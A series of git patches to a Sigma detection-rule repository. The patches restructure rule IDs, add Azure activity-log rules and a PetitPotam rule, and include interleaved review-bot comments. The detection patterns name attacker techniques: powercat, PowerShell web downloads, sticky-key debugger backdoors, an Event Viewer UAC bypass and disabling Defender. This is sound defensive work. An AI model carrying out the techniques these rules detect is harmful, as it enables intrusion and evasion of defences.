@@ -35,6 +36,7 @@ detection: service_creation: EventID: 6 --- +id: 2a926e6a-4b81-4011-8a96-e36cc8c04302 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_software_discovery.yml b/rules/windows/builtin/win_software_discovery.yml index b68643c6..39148779 100644 --- a/rules/windows/builtin/win_software_discovery.yml +++ b/rules/windows/builtin/win_software_discovery.yml @@ -1,6 +1,5 @@ action: global title: Detected Windows Software Discovery -id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. status: experimental author: Nikita Nazarov, oscd.community @@ -17,6 +16,7 @@ falsepositives: detection: condition: 1 of them --- +id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 logsource: product: windows service: powershell @@ -30,6 +30,7 @@ detection: - 'select-object' - 'format-table' --- +id: e13f668e-7f95-443d-98d2-1816a7648a7b logsource: category: process_creation product: windows diff --git a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml index 7cc461ad..fd57839c 100644 --- a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml +++ b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml @@ -1,6 +1,5 @@ action: global title: Regsvr32 Network Activity -id: c7e91a02-d771-4a6d-a700-42587e0b1095 description: Detects network connections and DNS queries initiated by Regsvr32.exe references: - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ @@ -31,10 +30,12 @@ falsepositives: - unknown level: high --- +id: c7e91a02-d771-4a6d-a700-42587e0b1095 logsource: category: network_connection product: windows --- +id: 36e037c4-c228-4866-b6a3-48eb292b9955 logsource: category: dns_query product: windows 
diff --git a/rules/windows/other/win_defender_disabled.yml b/rules/windows/other/win_defender_disabled.yml index 0c3281a6..4c7ec817 100644 --- a/rules/windows/other/win_defender_disabled.yml +++ b/rules/windows/other/win_defender_disabled.yml @@ -1,6 +1,5 @@ action: global title: Windows Defender Threat Detection Disabled -id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 description: Detects disabling Windows Defender threat protection date: 2020/07/28 modified: 2021/07/05 @@ -16,7 +15,8 @@ tags: falsepositives: - Administrator actions level: high ---- +--- +id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 logsource: product: windows service: windefend @@ -35,6 +35,7 @@ detection: Details: 'DWORD (0x00000001)' condition: 1 of them --- +id: a64e4198-c1c8-46a5-bc9c-324c86455fd4 logsource: product: windows category: registry_event @@ -45,6 +46,7 @@ detection: Details: 'DWORD (0x00000001)' condition: tamper_registry --- +id: 6c0a7755-6d31-44fa-80e1-133e57752680 logsource: product: windows category: system diff --git a/rules/windows/other/win_tool_psexec.yml b/rules/windows/other/win_tool_psexec.yml index 250429d1..60f46fc5 100644 --- a/rules/windows/other/win_tool_psexec.yml +++ b/rules/windows/other/win_tool_psexec.yml @@ -1,6 +1,5 @@ action: global title: PsExec Tool Execution -id: 42c575ea-e41e-41f1-b248-8093c3e82a28 status: experimental description: Detects PsExec service installation and execution events (service and Sysmon) author: Thomas Patzke @@ -28,6 +27,7 @@ falsepositives: - unknown level: low --- +id: 42c575ea-e41e-41f1-b248-8093c3e82a28 logsource: product: windows service: system @@ -40,6 +40,7 @@ detection: EventID: 7036 ServiceName: 'PSEXESVC' --- +id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba logsource: category: process_creation product: windows @@ -50,6 +51,7 @@ detection: - 'NT AUTHORITY\SYSTEM' - 'AUTORITE NT\Sys' # French language settings --- +id: f3f3a972-f982-40ad-b63c-bca6afdfad7c logsource: category: pipe_created product: windows 
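Review bot: The third document of win_defender_disabled.yml declares `category: system` under `logsource`, while every other Windows System-log document touched in this patch (win_mal_creddumper, win_tool_psexec, the service-install rules) uses `service: system`. Sigma has no `system` category for Windows, so unless a backend config happens to map it, this document will not convert and its detection silently never deploys. The line is context here, not introduced by this commit, but since the file is being touched anyway I would change it to `service: system` to match the sibling rules.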
@@ -57,6 +59,7 @@ detection: sysmon_pipecreated: PipeName: '\PSEXESVC' --- +id: 259e5a6a-b8d2-4c38-86e2-26c5e651361d logsource: category: file_event product: windows diff --git a/rules/windows/other/win_wmi_persistence.yml b/rules/windows/other/win_wmi_persistence.yml index 6a0d02d7..38819f13 100644 --- a/rules/windows/other/win_wmi_persistence.yml +++ b/rules/windows/other/win_wmi_persistence.yml @@ -1,6 +1,5 @@ action: global title: WMI Persistence -id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b status: experimental description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. author: Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community @@ -18,6 +17,7 @@ falsepositives: - Unknown (data set is too small; further testing needed) level: medium --- +id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b logsource: product: windows service: wmi #native windows detection @@ -34,6 +34,7 @@ detection: EventID: 5859 condition: (wmi_filter_to_consumer_binding and consumer_keywords) or (wmi_filter_registration) --- +id: f033f3f3-fd24-4995-97d8-a3bb17550a88 logsource: product: windows service: security diff --git a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml b/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml index 58ac60c3..48ba2bf0 100644 --- a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml +++ b/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml 
@@ -1,6 +1,5 @@ action: global title: Abusing Windows Telemetry For Persistence -id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 status: experimental description: Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. references: @@ -22,6 +21,7 @@ falsepositives: - none level: high --- +id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 logsource: product: windows category: registry_event @@ -32,6 +32,7 @@ detection: Details|re: '.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.ps|.vb|.jar|.hta|.msi|.vbs)$' condition: selection --- +id: f548a603-c9f2-4c89-b511-b089f7e94549 logsource: product: windows category: process_creation diff --git a/rules/windows/sysmon/sysmon_pingback_backdoor.yml b/rules/windows/sysmon/sysmon_pingback_backdoor.yml index 085c739e..a800c432 100644 --- a/rules/windows/sysmon/sysmon_pingback_backdoor.yml +++ b/rules/windows/sysmon/sysmon_pingback_backdoor.yml @@ -1,6 +1,5 @@ action: global title: Pingback Backdoor -id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 status: experimental description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report author: Bhabesh Raj @@ -15,6 +14,7 @@ tags: - attack.persistence - attack.t1574.001 --- +id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 logsource: product: windows category: file_event @@ -24,6 +24,7 @@ detection: TargetFilename: 'C:\Windows\oci.dll' condition: selection --- +id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b logsource: product: windows category: image_load @@ -33,6 +34,7 @@ detection: ImageLoaded: 'C:\Windows\oci.dll' condition: selection --- +id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 logsource: product: windows category: process_creation 
From d02ee1eddd3d96937c7ccae8c533618f9f7ecb53 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 21:16:55 +0200 Subject: [PATCH 0711/1367] Update global ID --- rules/windows/builtin/win_powershell_web_request.yml | 3 ++- .../builtin/win_susp_athremotefxvgpudisablementcommand.yml | 4 +++- rules/windows/builtin/win_tap_driver_installation.yml | 4 +++- rules/windows/malware/win_mal_blue_mockingbird.yml | 4 +++- .../powershell/powershell_alternate_powershell_hosts.yml | 3 ++- rules/windows/powershell/powershell_powercat.yml | 3 ++- .../powershell/powershell_remote_powershell_session.yml | 3 ++- .../registry_event/sysmon_dns_serverlevelplugindll.yml | 3 ++- .../windows/registry_event/sysmon_stickykey_like_backdoor.yml | 3 ++- .../registry_event/sysmon_sysinternals_eula_accepted.yml | 3 ++- rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml | 3 ++- rules/windows/sysmon/sysmon_config_modification.yml | 3 ++- .../sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml | 3 ++- 13 files changed, 29 insertions(+), 13 deletions(-) diff --git a/rules/windows/builtin/win_powershell_web_request.yml b/rules/windows/builtin/win_powershell_web_request.yml index 54319f96..427d7ea9 100644 --- a/rules/windows/builtin/win_powershell_web_request.yml +++ b/rules/windows/builtin/win_powershell_web_request.yml @@ -1,6 +1,5 @@ action: global title: Windows PowerShell Web Request -id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d status: experimental description: Detects the use of various web request methods (including aliases) via Windows PowerShell command references: @@ -19,6 +18,7 @@ falsepositives: - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. level: medium --- +id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d logsource: category: process_creation product: windows @@ -32,6 +32,7 @@ detection: - 'Net.WebClient' - 'Start-BitsTransfer' --- +id: 1139d2e2-84b1-4226-b445-354492eba8ba logsource: product: windows service: powershell 
diff --git a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml index e4d35a7b..6fdd897e 100644 --- a/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml +++ b/rules/windows/builtin/win_susp_athremotefxvgpudisablementcommand.yml @@ -1,6 +1,5 @@ action: global title: Abusable Invoke-ATHRemoteFXvGPUDisablementCommand -id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 status: experimental author: frack113 date: 2021/07/13 @@ -20,6 +19,7 @@ falsepositives: - Unknown level: medium --- +id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 logsource: product: windows category: process_creation @@ -34,6 +34,7 @@ detection: - '-RemoteFXvGPUDisablementFilePath' condition: selection_cmd and selection_opt --- +id: f65e22f9-819e-4f96-9c7b-498364ae7a25 logsource: product: windows service: powershell-classic @@ -49,6 +50,7 @@ detection: - '-RemoteFXvGPUDisablementFilePath' condition: selection_cmd and selection_opt --- +id: 38a7625e-b2cb-485d-b83d-aff137d859f4 logsource: product: windows service: powershell diff --git a/rules/windows/builtin/win_tap_driver_installation.yml b/rules/windows/builtin/win_tap_driver_installation.yml index a5baba35..cc3ce6e7 100644 --- a/rules/windows/builtin/win_tap_driver_installation.yml +++ b/rules/windows/builtin/win_tap_driver_installation.yml @@ -1,6 +1,5 @@ action: global title: Tap Driver Installation -id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques status: experimental author: Daniil Yugoslavskiy, Ian Davis, oscd.community @@ -16,6 +15,7 @@ detection: ImagePath|contains: 'tap0901' condition: selection --- +id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 logsource: product: windows service: system 
@@ -23,10 +23,12 @@ detection: selection: EventID: 7045 --- +id: 8bd47424-53e9-41ea-8a6a-a1f97b1bb0eb logsource: product: windows category: driver_load --- +id: 9c8afa4d-0022-48f0-9456-3712466f9701 logsource: product: windows service: security diff --git a/rules/windows/malware/win_mal_blue_mockingbird.yml b/rules/windows/malware/win_mal_blue_mockingbird.yml index 0752d958..096c0c44 100644 --- a/rules/windows/malware/win_mal_blue_mockingbird.yml +++ b/rules/windows/malware/win_mal_blue_mockingbird.yml @@ -1,6 +1,5 @@ action: global title: Blue Mockingbird -id: c3198a27-23a0-4c2c-af19-e5328d49680e status: experimental description: Attempts to detect system changes made by Blue Mockingbird references: @@ -17,6 +16,7 @@ level: high detection: condition: 1 of them --- +id: c3198a27-23a0-4c2c-af19-e5328d49680e logsource: category: process_creation product: windows @@ -27,6 +27,7 @@ detection: - 'sc config' - 'wercplsupporte.dll' --- +id: ce239692-aa94-41b3-b32f-9cab259c96ea logsource: category: process_creation product: windows @@ -35,6 +36,7 @@ detection: Image|endswith: '\wmic.exe' CommandLine|endswith: 'COR_PROFILER' --- +id: 92b0b372-a939-44ed-a11b-5136cf680e27 logsource: product: windows category: registry_event diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 5078913e..58cad683 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -1,6 +1,5 @@ action: global title: Alternate PowerShell Hosts -id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 @@ -18,6 +17,7 @@ falsepositives: - Citrix ConfigSync.ps1 level: medium --- +id: 64e8e417-c19a-475a-8d19-98ea705394cc logsource: product: windows service: powershell 
@@ -30,6 +30,7 @@ detection: ContextInfo|contains: 'powershell.exe' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event condition: selection and not filter --- +id: d7326048-328b-4d5e-98af-86e84b17c765 logsource: product: windows service: powershell-classic diff --git a/rules/windows/powershell/powershell_powercat.yml b/rules/windows/powershell/powershell_powercat.yml index c4c5cb0c..bf10582d 100644 --- a/rules/windows/powershell/powershell_powercat.yml +++ b/rules/windows/powershell/powershell_powercat.yml @@ -1,6 +1,5 @@ action: global title: Netcat The Powershell Version -id: c5b20776-639a-49bf-94c7-84f912b91c15 status: experimental author: frack113 date: 2021/07/21 @@ -16,6 +15,7 @@ falsepositives: - Unknown level: medium --- +id: c5b20776-639a-49bf-94c7-84f912b91c15 logsource: product: windows service: powershell-classic @@ -28,6 +28,7 @@ detection: - 'powercat.ps1' condition: selection --- +id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2 logsource: product: windows service: powershell diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index 652741eb..429a623b 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -1,6 +1,5 @@ action: global title: Remote PowerShell Session -id: 96b9f619-aa91-478f-bacb-c3e50f8df575 description: Detects remote PowerShell sessions status: test date: 2019/08/10 @@ -19,6 +18,7 @@ falsepositives: - Legitimate use remote PowerShell sessions level: high --- +id: 96b9f619-aa91-478f-bacb-c3e50f8df575 logsource: product: windows service: powershell @@ -31,6 +31,7 @@ detection: - 'wsmprovhost.exe' # HostApplication|contains: 'wsmprovhost.exe' french Application hôte = condition: selection --- +id: 60167e5c-84b2-4c95-a7ac-86281f27c445 logsource: product: windows service: powershell-classic 
diff --git a/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml b/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml index fd7d5d2c..a40600b8 100755 --- a/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml +++ b/rules/windows/registry_event/sysmon_dns_serverlevelplugindll.yml @@ -1,6 +1,5 @@ action: global title: DNS ServerLevelPluginDll Install -id: e61e8a88-59a9-451c-874e-70fcc9740d67 status: experimental description: Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required) @@ -25,6 +24,7 @@ falsepositives: - unknown level: high --- +id: e61e8a88-59a9-451c-874e-70fcc9740d67 logsource: product: windows category: registry_event @@ -33,6 +33,7 @@ detection: TargetObject|endswith: '\services\DNS\Parameters\ServerLevelPluginDll' condition: 1 of them --- +id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 logsource: category: process_creation product: windows diff --git a/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml b/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml index 7f23a329..eeaeb2cf 100755 --- a/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml +++ b/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml @@ -1,6 +1,5 @@ action: global title: Sticky Key Like Backdoor Usage -id: baca5663-583c-45f9-b5dc-ea96a22ce542 description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen references: @@ -19,6 +18,7 @@ falsepositives: - Unlikely level: critical --- +id: baca5663-583c-45f9-b5dc-ea96a22ce542 logsource: category: registry_event product: windows 
@@ -33,6 +33,7 @@ detection: - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger' condition: 1 of them --- +id: 2fdefcb3-dbda-401e-ae23-f0db027628bc logsource: category: process_creation product: windows diff --git a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml b/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml index 717e6b93..b4d8825b 100755 --- a/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml +++ b/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml @@ -1,6 +1,5 @@ action: global title: Usage of Sysinternals Tools -id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 status: experimental description: Detects the usage of Sysinternals Tools due to accepteula key being added to Registry references: @@ -12,6 +11,7 @@ falsepositives: - Programs that use the same Registry Key level: low --- +id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 logsource: product: windows category: registry_event @@ -20,6 +20,7 @@ detection: TargetObject|endswith: '\EulaAccepted' condition: 1 of them --- +id: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b logsource: category: process_creation product: windows diff --git a/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml b/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml index 065779e1..ed8f6054 100755 --- a/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_eventvwr.yml @@ -1,6 +1,5 @@ action: global title: UAC Bypass via Event Viewer -id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 status: experimental description: Detects UAC bypass method using Windows event viewer references: @@ -19,6 +18,7 @@ falsepositives: - unknown level: critical --- +id: 7c81fec3-1c1d-43b0-996a-46753041b1b6 logsource: product: windows category: registry_event 
@@ -28,6 +28,7 @@ detection: TargetObject|endswith: '\mscfile\shell\open\command' condition: methregistry --- +id: be344333-921d-4c4d-8bb8-e584cf584780 logsource: category: process_creation product: windows diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification.yml index 38367005..6ca045a7 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification.yml @@ -1,6 +1,5 @@ action: global title: Sysmon Configuration Modification -id: 1f2b5353-573f-4880-8e33-7d04dcf97744 description: Someone try to hide from Sysmon status: experimental author: frack113 @@ -16,6 +15,7 @@ falsepositives: - legitimate administrative action level: high --- +id: 1f2b5353-573f-4880-8e33-7d04dcf97744 logsource: product: windows category: sysmon_status @@ -26,6 +26,7 @@ detection: - 'Sysmon config state changed' condition: selection_stop or selection_conf --- +id: 815cd91b-7dbc-4247-841a-d7dd1392b0a8 logsource: product: windows category: sysmon_error diff --git a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml index eea60e94..76de527b 100644 --- a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml @@ -1,6 +1,5 @@ action: global title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum -id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef status: experimental description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum author: Sittikorn S @@ -20,6 +19,7 @@ falsepositives: - Unlikely level: critical --- +id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef logsource: product: windows category: file_event 
@@ -38,6 +38,7 @@ detection: - 'C:\Windows\system32\ime\IMETC\WimBootConfigurations.ini' condition: selection --- +id: 32b5db62-cb5f-4266-9639-0fa48376ac00 logsource: product: windows category: registry_event From 1272c76ae7774430412a4adb7dbacbf1779ff92c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 2 Sep 2021 20:31:27 -0500 Subject: [PATCH 0712/1367] Create azure_network_firewall_policy_modified_or_deleted.yml --- ...rk_firewall_policy_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml b/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml new file mode 100644 index 00000000..b087d550 --- /dev/null +++ b/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml 
@@ -0,0 +1,24 @@ +title: Azure Network Firewall Policy Modified or Deleted +id: 83c17918-746e-4bd9-920b-8e098bf88c23 +description: Identifies when a Firewall Policy is Modified or Deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/02 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/FIREWALLPOLICIES/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/JOIN/ACTION + - MICROSOFT.NETWORK/FIREWALLPOLICIES/CERTIFICATES/ACTION + - MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From d25fd420d60b07c7a94d41979a54237eb825a697 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 2 Sep 2021 20:48:35 -0500 Subject: [PATCH 0713/1367] Create azure_service_principal_created.yml --- .../azure/azure_service_principal_created.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure/azure_service_principal_created.yml diff --git a/rules/cloud/azure/azure_service_principal_created.yml b/rules/cloud/azure/azure_service_principal_created.yml new file mode 100644 index 00000000..6eabb075 --- /dev/null +++ b/rules/cloud/azure/azure_service_principal_created.yml 
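Review bot: The `tags` block carries only `attack.impact` with no technique, although modifying or deleting an Azure Firewall policy is the textbook case of ATT&CK T1562.007 (Impair Defenses: Disable or Modify Cloud Firewall), which sits under Defense Evasion; I would replace the block with `- attack.defense_evasion` and `- attack.t1562.007`. Note also that `MICROSOFT.NETWORK/FIREWALLPOLICIES/WRITE` fires on creation as well as modification, and `MICROSOFT.NETWORK/FIREWALLPOLICIES/JOIN/ACTION` is an association rather than a change to the policy, so either the description should say the rule covers create/join/update/delete or the JOIN entry should be dropped to keep the title honest. The rule does not restrict on the operation result, so failed attempts (which are arguably more interesting) and successes are treated alike; worth a sentence in `falsepositives`.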
@@ -0,0 +1,21 @@ +title: Azure Service Principal Created +id: 0ddcff6d-d262-40b0-804b-80eb592de8e3 +description: Identifies when a service principal is created in Azure. +author: Austin Songer +status: experimental +date: 2021/09/02 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: "Add service principal" + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Service principal being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 10af7bbdb1e10d08b786498d33ba2194113c5adc Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 2 Sep 2021 20:53:32 -0500 Subject: [PATCH 0714/1367] Create azure_app_credential_modification.yml --- .../azure_app_credential_modification.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure/azure_app_credential_modification.yml diff --git a/rules/cloud/azure/azure_app_credential_modification.yml b/rules/cloud/azure/azure_app_credential_modification.yml new file mode 100644 index 00000000..dec50c51 --- /dev/null +++ b/rules/cloud/azure/azure_app_credential_modification.yml 
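Review bot: "Add service principal" is an Azure AD audit-log activity (the linked reference is the AAD audit activities page), not an Azure Resource Manager activity-log operation, so `service: azure.activitylogs` looks like the wrong log source and the rule will never see the event if the backend routes it to the ARM activity-log index; confirm which logsource the repo uses for AAD audit events and use that. Creating a service principal is account creation, ATT&CK T1136.003 (Create Account: Cloud Account) under Persistence, rather than `attack.defense_evasion`; I would set `tags:` to `- attack.persistence` and `- attack.t1136.003`. The three `falsepositives` entries are one thought split across bullets; the second ("Verify whether the user identity...") is guidance, not a false-positive source, and reads better folded into the first.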
@@ -0,0 +1,21 @@ +title: Azure Application Credential Modified +id: cdeef967-f9a1-4375-90ee-6978c5f23974 +description: Identifies when a application credential is modified. +author: Austin Songer +status: experimental +date: 2021/09/02 +references: + - https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/ +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: "Update application - Certificates and secrets management" + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application credential added may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 643ec0abe3ced1facc09d7d5838ac758802386aa Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 2 Sep 2021 21:00:02 -0500 Subject: [PATCH 0715/1367] Update azure_service_principal_created.yml --- rules/cloud/azure/azure_service_principal_created.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_service_principal_created.yml b/rules/cloud/azure/azure_service_principal_created.yml index 6eabb075..82e422ca 100644 --- a/rules/cloud/azure/azure_service_principal_created.yml +++ b/rules/cloud/azure/azure_service_principal_created.yml @@ -1,7 +1,7 @@ title: Azure Service Principal Created id: 0ddcff6d-d262-40b0-804b-80eb592de8e3 description: Identifies when a service principal is created in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/02 references: From 775c0e8e7f19b2248d22e3497055dc639d08b5eb Mon Sep 17 00:00:00 2001 
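Review bot: "Update application - Certificates and secrets management" is an Azure AD audit-log activity, so as with the sibling service-principal rule `service: azure.activitylogs` (the ARM control plane) is probably the wrong source; verify the logsource the repo uses for AAD audit events before merging. The technique tag should be `attack.t1098.001` (Account Manipulation: Additional Cloud Credentials, under Persistence) rather than a bare `attack.impact`, since adding a secret or certificate to an app registration is the standard way to persist on a tenant. Minor wording: the description's "a application credential" should read "an application credential", and the `falsepositives` entries say "added" while the title says "modified"; this activity covers both adding and removing credentials, so "modified" is the accurate term throughout.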
From: Austin Songer Date: Thu, 2 Sep 2021 21:00:21 -0500 Subject: [PATCH 0716/1367] Update azure_app_credential_modification.yml --- rules/cloud/azure/azure_app_credential_modification.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_app_credential_modification.yml b/rules/cloud/azure/azure_app_credential_modification.yml index dec50c51..1a95a62c 100644 --- a/rules/cloud/azure/azure_app_credential_modification.yml +++ b/rules/cloud/azure/azure_app_credential_modification.yml @@ -1,7 +1,7 @@ title: Azure Application Credential Modified id: cdeef967-f9a1-4375-90ee-6978c5f23974 description: Identifies when a application credential is modified. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/02 references: From ba41e922d29e38990ffc43a2a85ed875dda21bb0 Mon Sep 17 00:00:00 2001 From: mvelazco Date: Fri, 3 Sep 2021 00:12:49 -0400 Subject: [PATCH 0717/1367] adding Petitpotam host detections --- .../builtin/win_petitpotam_network_share.yml | 25 ++++++++++++++ .../win_petitpotam_susp_tgt_request.yml | 34 +++++++++++++++++++ 2 files changed, 59 insertions(+) create mode 100644 rules/windows/builtin/win_petitpotam_network_share.yml create mode 100644 rules/windows/builtin/win_petitpotam_susp_tgt_request.yml diff --git a/rules/windows/builtin/win_petitpotam_network_share.yml b/rules/windows/builtin/win_petitpotam_network_share.yml new file mode 100644 index 00000000..15ee76da --- /dev/null +++ b/rules/windows/builtin/win_petitpotam_network_share.yml 
@@ -0,0 +1,25 @@
+title: Possible PetitPotam Coerce Authentication Attempt
+id: 1ce8c8a3-2723-48ed-8246-906ac91061a6
+description: Detect PetitPotam coerced authentication activity.
+author: Mauricio Velazco, Michael Haag
+date: 2021/09/02
+references:
+ - https://github.com/topotam/PetitPotam
+ - https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml
+tags:
+ - attack.credential_access
+ - attack.t1187
+logsource:
+ product: windows
+ service: security
+ definition: 'The advanced audit policy setting "Object Access > Detailed File Share" must be configured for Success/Failure'
+detection:
+ selection:
+ EventID: 5145
+ Share_Name: \\*\IPC$
+ Relative_Target_Name: lsarpc
+ Account_Name: ANONYMOUS LOGON
+ condition: selection
+falsepositives:
+ - Unknown. Feedback welcomed.
+level: high
diff --git a/rules/windows/builtin/win_petitpotam_network_share.yml b/rules/windows/builtin/win_petitpotam_network_share.yml
new file mode 100644
index 00000000..15ee76da
--- /dev/null
+++ b/rules/windows/builtin/win_petitpotam_network_share.yml
